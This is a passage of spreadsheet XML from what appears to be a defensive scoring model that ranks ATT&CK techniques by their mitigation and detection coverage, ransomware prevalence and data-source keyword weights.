        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC63" s="29" t="s">
        <v>334</v>
      </c>
      <c r="AD63" s="25" t="str" cm="1">
        <f t="array" ref="AD63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC63)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE63" s="25">
        <f>IF(AD63="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF63" s="25" t="str" cm="1">
        <f t="array" ref="AF63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC63)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG63" s="25">
        <f>IF(AF63="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH63" s="25" t="str" cm="1">
        <f t="array" ref="AH63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC63)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI63" s="25">
        <f>IF(AH63="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ63" s="25" t="str" cm="1">
        <f t="array" ref="AJ63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC63)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK63" s="25">
        <f>IF(AJ63="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL63" s="25" t="str" cm="1">
        <f t="array" ref="AL63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC63)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM63" s="25">
        <f>IF(AL63="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN63" s="60">
        <v>0</v>
      </c>
      <c r="AO63" s="51">
        <v>0</v>
      </c>
      <c r="AP63" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.6176290930000001E-2</v>
      </c>
      <c r="AQ63" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.25392096976666667</v>
      </c>
      <c r="AR63" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.25392096976666667</v>
      </c>
      <c r="AS63" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT63" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU6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64" spans="1:47" ht="32.1">
      <c r="A64" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.59351176014285723</v>
      </c>
      <c r="B64" s="25">
        <f>SUM(H64,M64,V64)*(1+SUM(AE64,AG64,AI64,AK64,AM64))</f>
        <v>0.26845093476190474</v>
      </c>
      <c r="C64" s="25" t="s">
        <v>335</v>
      </c>
      <c r="D64" s="25" t="s">
        <v>336</v>
      </c>
      <c r="E64" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F64" s="51">
        <v>1</v>
      </c>
      <c r="G64" s="51">
        <v>0</v>
      </c>
      <c r="H64" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I64">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J64">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K64">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L64">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M64" s="44">
        <v>1.368903E-2</v>
      </c>
      <c r="N64" s="51">
        <v>0</v>
      </c>
      <c r="O64" s="51">
        <v>5</v>
      </c>
      <c r="P64" s="51">
        <v>0</v>
      </c>
      <c r="Q64" s="51">
        <v>6</v>
      </c>
      <c r="R64" s="52" t="s">
        <v>288</v>
      </c>
      <c r="S64" s="51">
        <v>5</v>
      </c>
      <c r="T64" s="52" t="s">
        <v>337</v>
      </c>
      <c r="U64" s="51">
        <v>11</v>
      </c>
      <c r="V64" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20476190476190476</v>
      </c>
      <c r="W64">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X64">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y64">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z64">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>11</v>
      </c>
      <c r="AA64">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.11</v>
      </c>
      <c r="AB64">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.11</v>
      </c>
      <c r="AC64" s="29" t="s">
        <v>222</v>
      </c>
      <c r="AD64" s="25" t="str" cm="1">
        <f t="array" ref="AD64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC64)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE64" s="25">
        <f>IF(AD64="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF64" s="25" t="str" cm="1">
        <f t="array" ref="AF64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC64)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG64" s="25">
        <f>IF(AF64="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH64" s="25" t="str" cm="1">
        <f t="array" ref="AH64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC64)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI64" s="25">
        <f>IF(AH64="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ64" s="25" t="str" cm="1">
        <f t="array" ref="AJ64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC64)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK64" s="25">
        <f>IF(AJ64="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL64" s="25" t="str" cm="1">
        <f t="array" ref="AL64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC64)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM64" s="25">
        <f>IF(AL64="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN64" s="52">
        <v>17</v>
      </c>
      <c r="AO64" s="51">
        <v>1</v>
      </c>
      <c r="AP64" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.59351176014285723</v>
      </c>
      <c r="AQ64" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.9483644920634917E-2</v>
      </c>
      <c r="AR64" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.9483644920634917E-2</v>
      </c>
      <c r="AS64" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.80952380952380953</v>
      </c>
      <c r="AT64" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.80952380952380953</v>
      </c>
      <c r="AU6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65" spans="1:47" ht="17.100000000000001">
      <c r="A65" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.19639584223809525</v>
      </c>
      <c r="B65" s="25">
        <f>SUM(H65,M65,V65)*(1+SUM(AE65,AG65,AI65,AK65,AM65))</f>
        <v>0.29729175571428573</v>
      </c>
      <c r="C65" s="25" t="s">
        <v>338</v>
      </c>
      <c r="D65" s="25" t="s">
        <v>339</v>
      </c>
      <c r="E65" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F65" s="51">
        <v>2</v>
      </c>
      <c r="G65" s="51">
        <v>2</v>
      </c>
      <c r="H65" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I65">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J65">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K65">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L65">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M65" s="44">
        <v>1.1577469999999999E-2</v>
      </c>
      <c r="N65" s="51">
        <v>0</v>
      </c>
      <c r="O65" s="51">
        <v>0</v>
      </c>
      <c r="P65" s="51">
        <v>0</v>
      </c>
      <c r="Q65" s="51">
        <v>0</v>
      </c>
      <c r="R65" s="51" t="s">
        <v>340</v>
      </c>
      <c r="S65" s="51">
        <v>2</v>
      </c>
      <c r="T65" s="55" t="s">
        <v>303</v>
      </c>
      <c r="U65" s="51">
        <v>7</v>
      </c>
      <c r="V65" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W65">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X65">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y65">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z65">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA65">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB65">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC65" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD65" s="25" t="str" cm="1">
        <f t="array" ref="AD65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC65)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE65" s="25">
        <f>IF(AD65="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF65" s="25" t="str" cm="1">
        <f t="array" ref="AF65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC65)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG65" s="25">
        <f>IF(AF65="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH65" s="25" t="str" cm="1">
        <f t="array" ref="AH65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC65)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI65" s="25">
        <f>IF(AH65="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ65" s="25" t="str" cm="1">
        <f t="array" ref="AJ65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC65)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK65" s="25">
        <f>IF(AJ65="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL65" s="25" t="str" cm="1">
        <f t="array" ref="AL65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC65)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM65" s="25">
        <f>IF(AL65="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN65" s="61">
        <v>5</v>
      </c>
      <c r="AO65" s="51">
        <v>1</v>
      </c>
      <c r="AP65" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.19639584223809525</v>
      </c>
      <c r="AQ65" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.9097251904761915E-2</v>
      </c>
      <c r="AR65" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.9097251904761915E-2</v>
      </c>
      <c r="AS65" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT65" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU6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66" spans="1:47" ht="32.1">
      <c r="A66" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.13223613574666668</v>
      </c>
      <c r="B66" s="25">
        <f>SUM(H66,M66,V66)*(1+SUM(AE66,AG66,AI66,AK66,AM66))</f>
        <v>0.98902802413333335</v>
      </c>
      <c r="C66" s="25" t="s">
        <v>342</v>
      </c>
      <c r="D66" s="25" t="s">
        <v>343</v>
      </c>
      <c r="E66" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F66" s="51">
        <v>3</v>
      </c>
      <c r="G66" s="51">
        <v>3</v>
      </c>
      <c r="H66" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="I66">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J66">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K66">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L66">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M66" s="44">
        <v>1.029676E-2</v>
      </c>
      <c r="N66" s="51">
        <v>0</v>
      </c>
      <c r="O66" s="51">
        <v>0</v>
      </c>
      <c r="P66" s="51">
        <v>0</v>
      </c>
      <c r="Q66" s="51">
        <v>1</v>
      </c>
      <c r="R66" s="52" t="s">
        <v>344</v>
      </c>
      <c r="S66" s="51">
        <v>21</v>
      </c>
      <c r="T66" s="52" t="s">
        <v>345</v>
      </c>
      <c r="U66" s="51">
        <v>24</v>
      </c>
      <c r="V66" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="W66">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>45</v>
      </c>
      <c r="X66">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.81818181818181823</v>
      </c>
      <c r="Y66">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.81818181818181823</v>
      </c>
      <c r="Z66">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA66">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB66">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC66" s="29" t="s">
        <v>346</v>
      </c>
      <c r="AD66" s="25" t="str" cm="1">
        <f t="array" ref="AD66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC66)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE66" s="25">
        <f>IF(AD66="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF66" s="25" t="str" cm="1">
        <f t="array" ref="AF66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC66)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG66" s="25">
        <f>IF(AF66="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH66" s="25" t="str" cm="1">
        <f t="array" ref="AH66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC66)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI66" s="25">
        <f>IF(AH66="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ66" s="25" t="str" cm="1">
        <f t="array" ref="AJ66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC66)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK66" s="25">
        <f>IF(AJ66="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL66" s="25" t="str" cm="1">
        <f t="array" ref="AL66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC66)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM66" s="25">
        <f>IF(AL66="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN66" s="60">
        <v>1</v>
      </c>
      <c r="AO66" s="51">
        <v>1</v>
      </c>
      <c r="AP66" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.13223613574666668</v>
      </c>
      <c r="AQ66" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.32967600804444447</v>
      </c>
      <c r="AR66" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.32967600804444447</v>
      </c>
      <c r="AS66" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT66" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU6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67" spans="1:47" ht="48">
      <c r="A67" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.8559227300190487E-2</v>
      </c>
      <c r="B67" s="25">
        <f>SUM(H67,M67,V67)*(1+SUM(AE67,AG67,AI67,AK67,AM67))</f>
        <v>0.48559227300190483</v>
      </c>
      <c r="C67" s="25" t="s">
        <v>347</v>
      </c>
      <c r="D67" s="25" t="s">
        <v>348</v>
      </c>
      <c r="E67" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F67" s="51">
        <v>1</v>
      </c>
      <c r="G67" s="51">
        <v>1</v>
      </c>
      <c r="H67" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I67">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J67">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K67">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L67">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M67" s="44">
        <v>9.9208200000000003E-3</v>
      </c>
      <c r="N67" s="51">
        <v>0</v>
      </c>
      <c r="O67" s="51">
        <v>1</v>
      </c>
      <c r="P67" s="51">
        <v>2</v>
      </c>
      <c r="Q67" s="51">
        <v>0</v>
      </c>
      <c r="R67" s="52" t="s">
        <v>349</v>
      </c>
      <c r="S67" s="51">
        <v>9</v>
      </c>
      <c r="T67" s="52" t="s">
        <v>350</v>
      </c>
      <c r="U67" s="51">
        <v>23</v>
      </c>
      <c r="V67" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31904761904761908</v>
      </c>
      <c r="W67">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X67">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y67">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z67">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA67">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB67">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC67" s="29" t="s">
        <v>351</v>
      </c>
      <c r="AD67" s="25" t="str" cm="1">
        <f t="array" ref="AD67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC67)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE67" s="25">
        <f>IF(AD67="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF67" s="25" t="str" cm="1">
        <f t="array" ref="AF67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC67)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG67" s="25">
        <f>IF(AF67="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH67" s="25" t="str" cm="1">
        <f t="array" ref="AH67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC67)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI67" s="25">
        <f>IF(AH67="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ67" s="25" t="str" cm="1">
        <f t="array" ref="AJ67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC67)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK67" s="25">
        <f>IF(AJ67="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL67" s="25" t="str" cm="1">
        <f t="array" ref="AL67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC67)))))&gt;0,"1","0")</f>
        <v>0</v>
